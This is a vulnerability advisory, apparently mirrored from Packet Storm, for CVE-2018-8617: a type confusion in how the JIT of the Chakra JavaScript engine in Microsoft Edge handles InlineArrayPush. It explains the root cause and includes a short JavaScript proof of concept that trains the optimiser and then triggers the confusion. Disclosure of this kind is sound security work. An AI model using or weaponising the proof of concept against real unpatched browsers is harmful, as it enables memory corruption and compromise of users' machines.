Microsoft Edge suffers from a Chakra related type confusion vulnerability in InlineArrayPush.
789b214a31a71d7137e78ec7849729dcb9e3b8a75a7308f4a4b8b569c079222eMicrosoft Edge: Chakra: Type confusion with InlineArrayPush
CVE-2018-8617
In Chakra, if you add a numeric property to an object having inlined properties, it will start transition to a new type where the space for some of previously inlined properties become for the pointer to the property slots and the pointer to the object array which stores numeric properties. For this reason, when it optimizes an InlineArrayPush instruction which might start transition, it needs to kill corresponding type symbols to prevent type confusion. But it doesn't, so it can lead to type confusion.
PoC:
function opt(a, b) {
a.b = 2;
b.push(0);
a.a = 0x1234;
}
function main() {
Object.prototype.push = Array.prototype.push;
for (let i = 0; i < 1000; i++) {
let a = {a: 1, b: 2};
opt(a, {});
}
let o = {a: 1, b: 2};
opt(o, o);
print(o.a);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: lokihardt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed